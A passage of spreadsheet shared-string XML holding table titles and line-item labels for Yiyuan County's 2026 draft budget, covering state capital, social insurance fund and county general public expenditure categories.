        <charset val="134"/>
      </rPr>
      <t>调出资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年终累计结余</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支出总计</t>
    </r>
  </si>
  <si>
    <t>表30</t>
  </si>
  <si>
    <t>2026年沂源县国有资本经营预算收入草案表（代编）</t>
  </si>
  <si>
    <t>比上年增长</t>
  </si>
  <si>
    <t>国有参股公司股息红利收入</t>
  </si>
  <si>
    <t>其他国有资本经营预算企业股息红利收入</t>
  </si>
  <si>
    <t>国有股权、股份转让收入</t>
  </si>
  <si>
    <t>其他国有资本经营预算企业产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上年结转收入</t>
  </si>
  <si>
    <t>表31</t>
  </si>
  <si>
    <t>2026年沂源县国有资本经营预算支出草案表（代编）</t>
  </si>
  <si>
    <t>解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">  国有企业政策性补贴</t>
  </si>
  <si>
    <t>本年支出合计</t>
  </si>
  <si>
    <t xml:space="preserve">    结转下年</t>
  </si>
  <si>
    <t>表32</t>
  </si>
  <si>
    <t>2026年沂源县社会保险基金预算收入草案表（代编）</t>
  </si>
  <si>
    <t>项      目</t>
  </si>
  <si>
    <t>表33</t>
  </si>
  <si>
    <t>2026年沂源县社会保险基金预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：基本养老金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：基础养老金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其中：社会保险待遇支出</t>
    </r>
  </si>
  <si>
    <t>表34</t>
  </si>
  <si>
    <t>2026年末沂源县社会保险基金预算结余预算表（代编）</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>第四部分 
2026年县级预算草案</t>
  </si>
  <si>
    <t>表35</t>
  </si>
  <si>
    <t>2026年沂源县县级一般公共预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资源</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资产</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有偿使用收入</t>
    </r>
  </si>
  <si>
    <t>本级本年收入合计</t>
  </si>
  <si>
    <t>表36</t>
  </si>
  <si>
    <t xml:space="preserve">   2026年沂源县县级一般公共预算支出草案表</t>
  </si>
  <si>
    <t>本级本年支出合计</t>
  </si>
  <si>
    <t>上解支出</t>
  </si>
  <si>
    <t>年终结余</t>
  </si>
  <si>
    <t>表37</t>
  </si>
  <si>
    <t>2026年沂源县县级一般公共预算支出草案表
(功能分类)</t>
  </si>
  <si>
    <t>科目代码</t>
  </si>
  <si>
    <t>科目名称</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一般公共服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一般行政管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机关服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大会议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大立法</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大代表履职能力提升</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>代表工作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人大信访工作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>事业运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他人大事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政协事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政协会议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>委员视察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>参政议政</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他政协事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政府办公厅</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>室</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>及相关机构事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项业务及机关事务管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政务公开审批</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信访事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>参事事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他政府办公厅</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>室</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>及相关机构事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>发展与改革事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>战略规划与实施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>日常经济运行调节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会事业发展规划</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>经济体制改革研究</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>物价管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他发展与改革事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>统计信息事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信息事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项统计业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>统计管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项普查活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>统计抽样调查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他统计信息事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>预算改革业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政国库业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政监察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信息化建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政委托业务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他财政事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>税收事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>税收业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>审计事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>审计业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>审计管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他审计事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海关事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>缉私办案</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>口岸管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海关关务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>关税征管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海关监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>检验检疫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他海关事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>纪检监察事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大案要案查处</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>派驻派出机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>巡视工作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他纪检监察事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>商贸事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外贸易管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际经济合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>外资管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国内贸易管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>招商引资</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
